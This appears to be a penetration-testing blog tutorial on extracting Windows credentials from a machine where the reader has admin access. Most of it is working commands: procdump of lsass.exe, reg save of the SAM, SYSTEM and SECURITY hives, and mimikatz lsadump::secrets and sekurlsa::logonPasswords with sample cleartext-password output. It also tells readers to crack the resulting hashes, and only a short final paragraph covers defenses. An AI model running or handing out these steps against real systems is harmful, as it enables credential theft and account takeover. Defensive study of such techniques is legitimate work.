This article explains how to extract various Windows dumps of passwords from a target system. To follow along with this article, you’ll need to have administrative access to the target Windows machine, and any endpoint security will need to be tolerant of your activities. Any good AV will likely prevent this activity. Well, it should. If not, use something else. BitDefender, CrowedStrike and Windows Defender prevent these attack types – as well as patching the target Windows machine and ensuring limited access to administrative privileges.
This article gives an example of retrieving those credentials for analysis. This might include cracking the hashes.
We’ll keep it simple and assume the following:
- You have Administrator access to the target machine.
- You’re able to log into the target machine.
- The target machine is Windows 10 Pro.
- The local antivirus is permissive of this effort.
Get the password databases
Dump the lsass.exe memory
Our first step is to get SysInternals tools available to us. We can map to this as follows:
net use S: https://live.sysinternals.com/tools
Now we have access to the tools we need. Dump the “lsass.exe” process memory to file:
S:\procdump -accepteula -ma lsass.exe C:\Users\MyUser\lsass.dmp
This process can (but shouldn’t) take a long time to complete. It can also hang the target machine so be careful when doing it over an RDP session.
We no longer need the SysInternals (S: Drive) so remove it:
net use S: /DELETE
Dump the local registry database
Now we can dump the local password database. This isn’t related to lsass.exe memory dump. This is just additional hashes we can harvest.
reg save hklm\sam c:\sam.dump reg save hklm\system c:\system.dump reg save hklm\security c:\security.dump
The result of the above two commands is two files we can interrogate for password hashes. These two files go together and have nothing to do with the “lsass.exe” memory dump we did earlier. It’s just a matter of getting as much as we can to work with.
At this point we have the cached passwords from “lsass.exe” and the file “security”, “sam” and “system” dump files.
Extract the hashes and passwords
Once the above dumping is complete, we need to extract the hashes. We’ll use “mimikatz” for this. Download it from:
Extract the archive. Now you should be able to find the executable “mimikatz.exe” file.
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( email@example.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( firstname.lastname@example.org ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz #
To extract hashes from the local password dump (the “system” and “security” dump files):
log hash2.txt privilege::debug lsadump::secrets /system:c:\system.dump /security:c:\security.dump /sam:c:\sam.dump
The output will include something like this:
Local name : COMPUTERNAME ( S-1-2-3-4-5-6-7-8-9-0 ) Domain name : SOMETHING ( S-1-2-3-4-5-6-7-8-9-0 ) Domain FQDN : SOMETHING Secret : SOMETHING cur/text: MyClearTextPassword old/text: MyClearTextPassword Secret : SOMETHING Secret : _SOMETHING/ service 'SOMETHING' with username : .\SOMETHING cur/text: MyClearTextPassword mimikatz #
We can see a few clear text passwords in the above output.
To extract passwords from the “lsass.exe” memory dump – while still in mimikatz:
sekurlsa::minidump C:\Users\MyUser\lsass.dmp sekurlsa::logonPasswords
Here’s a sample of the output:
mimikatz # sekurlsa::minidump C:\Users\MyUser\lsass.dmp Switch to MINIDUMP : 'C:\Users\MyUser\lsass.dmp' mimikatz # sekurlsa::logonPasswords Opening : 'C:\Users\MyUser\lsass.dmp' file for minidump... Authentication Id : 0 ; 1658638 (00000000:000000f0e) Session : Interactive from 1 User Name : MyUserName Domain : AzureAD Logon Server : (null) Logon Time : 20/07/2021 8:58:10 AM SID : S-1-2-3-4-5-6-7-8-9-0 msv : tspkg : wdigest : * Username : email@example.com * Domain : AzureAD * Password : (null) kerberos : * Username : firstname.lastname@example.org * Domain : AzureAD * Password : (null) ssp :  * Username : email@example.com * Domain : (null) * Password : MyPasswordInClearText credman :  * Username : WORKGROUP\myuser * Domain : 10.1.2.3 * Password : MyPasswordInClearText cloudap
The most interesting output in the above sample is “Password :”. These are in plain text.
You can take the hashes and run them through John (JTR) or submit them to “https://crackstation.net”.
Protecting against this attack
This attack aims to retrieve the various password caches on a Windows machine. Prevent SysInternals from being installed on the machine as a matter of policy. Good end-point security will prevent access to the “lsass.exe” memory and the execution of “mimikatz”. The attacker might try to use the “net use” to get SysInternals to bypass the policy of no SysInternals being installed on a machine. And the need for “mimikatz” can be skipped by copying the dumps to an external computer that the attack controls. Still, the attacker needs administrative privileges on the target windows machine to access the memory and registry keys. Preventing normal users from administrative access, and ensuring the windows machine is up to date with security features enabled will go a long way to preventing this attack.